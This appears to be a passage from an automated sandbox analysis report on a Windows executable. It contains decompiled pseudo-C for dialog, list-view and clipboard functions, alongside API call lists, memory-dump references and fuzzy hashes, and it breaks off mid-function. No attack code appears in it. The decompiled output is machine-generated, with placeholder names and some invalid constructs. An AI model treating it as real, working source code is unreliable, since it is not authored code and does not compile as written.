                                                                                                                                                                    							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
                                                                                                                                                                    							__eflags = _t91 & 0x00000002;
                                                                                                                                                                    							if((_t91 & 0x00000002) != 0) {
                                                                                                                                                                    								_t92 = _t91 & 0x0000f000;
                                                                                                                                                                    								__eflags = _t92 - 0x1000;
                                                                                                                                                                    								_a8 = _t92;
                                                                                                                                                                    								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
                                                                                                                                                                    								_a8 - 0x2000 = _a8 == 0x2000;
                                                                                                                                                                    								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L39;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags =  *(_t151 + 0x18) & 0x00000002;
                                                                                                                                                                    						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
                                                                                                                                                                    							goto L37;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L36;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				_t100 = _t75 - 0xc2;
                                                                                                                                                                    				if(_t100 == 0) {
                                                                                                                                                                    					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
                                                                                                                                                                    					E004031BE(_t158);
                                                                                                                                                                    					E00405B17(_t149,  *(_t158 + 0x10), 0);
                                                                                                                                                                    					goto L27;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t104 = _t100 - 1;
                                                                                                                                                                    				if(_t104 != 0) {
                                                                                                                                                                    					goto L27;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t128 = _a8 >> 0x10;
                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
                                                                                                                                                                    					L7:
                                                                                                                                                                    					if(_t128 != 0) {
                                                                                                                                                                    						goto L27;
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8 != 0x3f0) {
                                                                                                                                                                    						L13:
                                                                                                                                                                    						if(_a8 == 0x3eb) {
                                                                                                                                                                    							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a8 == 0x3ec) {
                                                                                                                                                                    							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a8 == 0x3ee) {
                                                                                                                                                                    							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a8 == 0x3ef) {
                                                                                                                                                                    							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a8 == 2) {
                                                                                                                                                                    							EndDialog( *(_t158 + 0x10), 2);
                                                                                                                                                                    						}
                                                                                                                                                                    						if(_a8 == 1) {
                                                                                                                                                                    							E0040314A(_t158);
                                                                                                                                                                    							EndDialog( *(_t158 + 0x10), 1);
                                                                                                                                                                    						}
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
                                                                                                                                                                    					_t132 = 0;
                                                                                                                                                                    					if(_t131 <= 0) {
                                                                                                                                                                    						L12:
                                                                                                                                                                    						E004031BE(_t158);
                                                                                                                                                                    						goto L13;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t150 = 0;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
                                                                                                                                                                    						 *(_t122 + 2) = _t132;
                                                                                                                                                                    						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
                                                                                                                                                                    						_t132 = _t132 + 1;
                                                                                                                                                                    						_t150 = _t150 + 0x14;
                                                                                                                                                                    						 *_t122 = _t157;
                                                                                                                                                                    					} while (_t132 < _t131);
                                                                                                                                                                    					goto L12;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					if(_a8 != 0x3ed) {
                                                                                                                                                                    						goto L27;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						E004030F2(__ecx, __ecx);
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    			}




















                                                                                                                                                                    0x00403362
                                                                                                                                                                    0x0040337c
                                                                                                                                                                    0x0040337f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040338b
                                                                                                                                                                    0x004033c0
                                                                                                                                                                    0x004033d1
                                                                                                                                                                    0x004033d9
                                                                                                                                                                    0x004033d9
                                                                                                                                                                    0x004033e4
                                                                                                                                                                    0x004033ec
                                                                                                                                                                    0x004033ec
                                                                                                                                                                    0x004033f7
                                                                                                                                                                    0x00403402
                                                                                                                                                                    0x00403408
                                                                                                                                                                    0x0040340f
                                                                                                                                                                    0x0040341a
                                                                                                                                                                    0x00403420
                                                                                                                                                                    0x0040342c
                                                                                                                                                                    0x00403433
                                                                                                                                                                    0x00403433
                                                                                                                                                                    0x0040343a
                                                                                                                                                                    0x0040343e
                                                                                                                                                                    0x00403448
                                                                                                                                                                    0x00403448
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040344c
                                                                                                                                                                    0x00403390
                                                                                                                                                                    0x00403393
                                                                                                                                                                    0x00403397
                                                                                                                                                                    0x004033ba
                                                                                                                                                                    0x004033bb
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x004033bb
                                                                                                                                                                    0x00403399
                                                                                                                                                                    0x0040339b
                                                                                                                                                                    0x004033a0
                                                                                                                                                                    0x004033a3
                                                                                                                                                                    0x004033aa
                                                                                                                                                                    0x004033af
                                                                                                                                                                    0x004033b0
                                                                                                                                                                    0x004033b5
                                                                                                                                                                    0x004033b5
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0040336b
                                                                                                                                                                    0x00403371
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00403377
                                                                                                                                                                    0x00403377
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00403377
                                                                                                                                                                    0x00403371

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004033D7
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004033EA
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004033FF
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00403417
                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00403433
                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00403448
                                                                                                                                                                      • Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
                                                                                                                                                                      • Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114
                                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 00403460
                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3975816621-0
                                                                                                                                                                    • Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                                    • Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
                                                                                                                                                                    • Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
                                                                                                                                                                    • Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                    			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                                                                                                                    				RECT* _v8;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t39;
                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				struct HWND__* _t47;
                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                    				void* _t54;
                                                                                                                                                                    				signed int _t74;
                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				void** _t80;
                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                    				void* _t88;
                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                    
                                                                                                                                                                    				_t78 = __edi;
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(__edi + 0x44)) = __eax;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                    					_t80 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(__eax)) = 0;
                                                                                                                                                                    					_t80 = __eax;
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t78 + 0x40) = _t80;
                                                                                                                                                                    				_t39 =  *_t80;
                                                                                                                                                                    				_t88 = _t39;
                                                                                                                                                                    				if(_t88 != 0) {
                                                                                                                                                                    					_push(_t39);
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    					 *_t80 = 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t80[2] = _a8;
                                                                                                                                                                    				_t41 = E0040299A(_a8);
                                                                                                                                                                    				_t74 = 4;
                                                                                                                                                                    				_t80[1] = _t41;
                                                                                                                                                                    				_t42 = _t41 * _t74;
                                                                                                                                                                    				_push( ~(0 | _t88 > 0x00000000) | _t42);
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				 *_t80 = _t42;
                                                                                                                                                                    				memset(_t42, 0, _t80[1] << 2);
                                                                                                                                                                    				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
                                                                                                                                                                    				_t89 =  *(_t78 + 0x44);
                                                                                                                                                                    				if(_t89 == 0) {
                                                                                                                                                                    					_t84 = ( *(_t78 + 0x40))[1];
                                                                                                                                                                    					_t76 = 0x14;
                                                                                                                                                                    					_t53 = _t84 * _t76;
                                                                                                                                                                    					_push( ~(0 | _t89 > 0x00000000) | _t53);
                                                                                                                                                                    					L0040E038();
                                                                                                                                                                    					 *(_t78 + 0x44) = _t53;
                                                                                                                                                                    					if(_t84 > 0) {
                                                                                                                                                                    						_t54 = 0;
                                                                                                                                                                    						do {
                                                                                                                                                                    							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
                                                                                                                                                                    							_t54 = _t54 + 0x14;
                                                                                                                                                                    							_t84 = _t84 - 1;
                                                                                                                                                                    						} while (_t84 != 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					_v8 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				if(E0040152F(0x448, _t78, _a4) == 1) {
                                                                                                                                                                    					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
                                                                                                                                                                    					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t47 = SetFocus(_a8);
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					_push( *(_t78 + 0x44));
                                                                                                                                                                    					L0040E032();
                                                                                                                                                                    					return _t47;
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t47;
                                                                                                                                                                    			}




















                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                    			E004054F1(void* _a4) {
                                                                                                                                                                    				int _t7;
                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                    				int _t14;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                    				void* _t23;
                                                                                                                                                                    
                                                                                                                                                                    				_t23 = _a4;
                                                                                                                                                                    				_t20 = 0;
                                                                                                                                                                    				EmptyClipboard();
                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                    					_t7 = wcslen(_t23);
                                                                                                                                                                    					_t3 = _t7 + 2; // 0x2
                                                                                                                                                                    					_t14 = _t7 + _t3;
                                                                                                                                                                    					_t18 = GlobalAlloc(0x2000, _t14);
                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                    						memcpy(GlobalLock(_t18), _t23, _t14);
                                                                                                                                                                    						GlobalUnlock(_t18);
                                                                                                                                                                    						_t12 = SetClipboardData(0xd, _t18);
                                                                                                                                                                    						asm("sbb esi, esi");
                                                                                                                                                                    						_t20 =  ~( ~_t12);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				CloseClipboard();
                                                                                                                                                                    				return _t20;
                                                                                                                                                                    			}










                                                                                                                                                                    APIs
                                                                                                                                                                    • EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
                                                                                                                                                                    • wcslen.MSVCRT ref: 00405506
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00405523
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040552C
                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405535
                                                                                                                                                                    • SetClipboardData.USER32 ref: 0040553E
                                                                                                                                                                    • CloseClipboard.USER32(?,?,0040AE96,00000000), ref: 0040554E

                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                    			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t75;
                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                    				signed short _t86;
                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                    				intOrPtr _t90;
                                                                                                                                                                    				signed short _t96;
                                                                                                                                                                    				void* _t98;
                                                                                                                                                                    				signed int _t126;
                                                                                                                                                                    				signed int _t128;
                                                                                                                                                                    				signed int _t130;
                                                                                                                                                                    				intOrPtr* _t133;
                                                                                                                                                                    				signed int _t137;
                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                    				void* _t142;
                                                                                                                                                                    				void* _t143;
                                                                                                                                                                    				void* _t147;
                                                                                                                                                                    
                                                                                                                                                                    				_t143 = __eflags;
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                    				_t133 = __eax;
                                                                                                                                                                    				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
                                                                                                                                                                    				E0040768E(__eax);
                                                                                                                                                                    				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
                                                                                                                                                                    				_t137 = 0xb;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
                                                                                                                                                                    				_t126 = 0x14;
                                                                                                                                                                    				_t75 = _t137 * _t126;
                                                                                                                                                                    				 *(_t133 + 0x2e0) = _t137;
                                                                                                                                                                    				_push( ~(0 | _t143 > 0x00000000) | _t75);
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				 *(_t133 + 0x2e4) = _t75;
                                                                                                                                                                    				_t128 = 0x14;
                                                                                                                                                                    				_t77 = _t137 * _t128;
                                                                                                                                                                    				_push( ~(0 | _t143 > 0x00000000) | _t77);
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				_t98 = 0x4120c0;
                                                                                                                                                                    				 *(_t133 + 0x48) = _t77;
                                                                                                                                                                    				_v8 = 0x4120c0;
                                                                                                                                                                    				do {
                                                                                                                                                                    					_t139 =  *_t98 * 0x14;
                                                                                                                                                                    					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
                                                                                                                                                                    					_t24 = _t98 + 0x14; // 0x4120d4
                                                                                                                                                                    					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
                                                                                                                                                                    					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
                                                                                                                                                                    					_t142 = _t142 + 0x18;
                                                                                                                                                                    					_v12 = _t86;
                                                                                                                                                                    					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
                                                                                                                                                                    					if((_t86 & 0xffff0000) == 0) {
                                                                                                                                                                    						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
                                                                                                                                                                    						_t96 = E00406827(_v12 | 0x00010000);
                                                                                                                                                                    						_t98 = _v8;
                                                                                                                                                                    						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t98 = _t98 + 0x28;
                                                                                                                                                                    					_t147 = _t98 - 0x412278;
                                                                                                                                                                    					_v8 = _t98;
                                                                                                                                                                    				} while (_t147 < 0);
                                                                                                                                                                    				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
                                                                                                                                                                    				_t88 = 0xb;
                                                                                                                                                                    				_t130 = 4;
                                                                                                                                                                    				 *(_t133 + 0x34) = _t88;
                                                                                                                                                                    				_t89 = _t88 * _t130;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
                                                                                                                                                                    				_push( ~(0 | _t147 > 0x00000000) | _t89);
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				 *(_t133 + 0x38) = _t89;
                                                                                                                                                                    				L0040E038();
                                                                                                                                                                    				_t140 = _t89;
                                                                                                                                                                    				if(_t89 == 0) {
                                                                                                                                                                    					_t90 = 0;
                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
                                                                                                                                                                    				}
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x54)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x58)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
                                                                                                                                                                    				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
                                                                                                                                                                    				return E00407861(_t133);
                                                                                                                                                                    			}


























                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
                                                                                                                                                                      • Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00407923
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040793F
                                                                                                                                                                    • memcpy.MSVCRT ref: 00407962
                                                                                                                                                                    • memcpy.MSVCRT ref: 00407973
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004079F4
                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004079FE
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                      • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                      • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                      • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                    • String ID: x"A
                                                                                                                                                                    • API String ID: 975042529-63625180
                                                                                                                                                                    • Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                                    • Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
                                                                                                                                                                    • Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 49%
                                                                                                                                                                    			E004031BE(intOrPtr _a4) {
                                                                                                                                                                    				struct HWND__* _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				int _v16;
                                                                                                                                                                    				int _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				short _v28;
                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                    				char* _v60;
                                                                                                                                                                    				void* _v72;
                                                                                                                                                                    				void _v582;
                                                                                                                                                                    				char _v584;
                                                                                                                                                                    				struct HWND__* _t52;
                                                                                                                                                                    				intOrPtr* _t58;
                                                                                                                                                                    				void* _t59;
                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                    				void* _t71;
                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                    				void* _t82;
                                                                                                                                                                    				intOrPtr _t87;
                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                    				short* _t90;
                                                                                                                                                                    				void* _t92;
                                                                                                                                                                    				void* _t93;
                                                                                                                                                                    
                                                                                                                                                                    				_t87 = _a4;
                                                                                                                                                                    				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
                                                                                                                                                                    				_v8 = _t52;
                                                                                                                                                                    				SendMessageW(_t52, 0x1009, 0, 0);
                                                                                                                                                                    				SendMessageW(_v8, 0x1036, 0, 0x26);
                                                                                                                                                                    				do {
                                                                                                                                                                    				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
                                                                                                                                                                    				_push(0xc8);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                    				_t78 = 6;
                                                                                                                                                                    				E00402842(0x40f454, _t78);
                                                                                                                                                                    				_t58 =  *((intOrPtr*)(_t87 + 0x40));
                                                                                                                                                                    				_t79 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                                    				_t77 =  *_t58;
                                                                                                                                                                    				_t93 = _t92 + 0x10;
                                                                                                                                                                    				_v24 = _t79;
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				if(_t79 <= 0) {
                                                                                                                                                                    					L10:
                                                                                                                                                                    					_t59 = 2;
                                                                                                                                                                    					E004027D3(_t59, _v8, 0, _t59);
                                                                                                                                                                    					return SetFocus(_v8);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					goto L3;
                                                                                                                                                                    				}
                                                                                                                                                                    				do {
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t89 = _v12 << 2;
                                                                                                                                                                    						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
                                                                                                                                                                    							_v584 = 0;
                                                                                                                                                                    							memset( &_v582, 0, 0x1fe);
                                                                                                                                                                    							_t93 = _t93 + 0xc;
                                                                                                                                                                    							_v60 =  &_v584;
                                                                                                                                                                    							_v72 = 4;
                                                                                                                                                                    							_v56 = 0xff;
                                                                                                                                                                    							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
                                                                                                                                                                    								_push(0);
                                                                                                                                                                    								_push(_v12);
                                                                                                                                                                    								_push(0);
                                                                                                                                                                    								_push(0);
                                                                                                                                                                    								_push(0);
                                                                                                                                                                    								_push(_v8);
                                                                                                                                                                    								_t82 = 5;
                                                                                                                                                                    								_t71 = E004028C5( &_v584, _t82);
                                                                                                                                                                    								_t90 = _t89 + _t77;
                                                                                                                                                                    								_t83 =  *_t90;
                                                                                                                                                                    								_v28 =  *_t90;
                                                                                                                                                                    								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
                                                                                                                                                                    								_t93 = _t93 + 0x24;
                                                                                                                                                                    								if(_v28 == 0) {
                                                                                                                                                                    									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
                                                                                                                                                                    								}
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                    						_t63 = _v24;
                                                                                                                                                                    						_v20 = _v20 + 0x14;
                                                                                                                                                                    					} while (_v12 < _t63);
                                                                                                                                                                    					_v16 = _v16 + 1;
                                                                                                                                                                    				} while (_v16 < _t63);
                                                                                                                                                                    				goto L10;
                                                                                                                                                                    			}


                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDlgItem.USER32 ref: 004031D5
                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
                                                                                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
                                                                                                                                                                    • memset.MSVCRT ref: 0040326B
                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
                                                                                                                                                                    • SetFocus.USER32(?), ref: 00403326
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                    • Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                                    • Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
                                                                                                                                                                    • Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
                                                                                                                                                                    • Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                    			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                    				void _v68;
                                                                                                                                                                    				char _v108;
                                                                                                                                                                    				void _v160;
                                                                                                                                                                    				void* __esi;
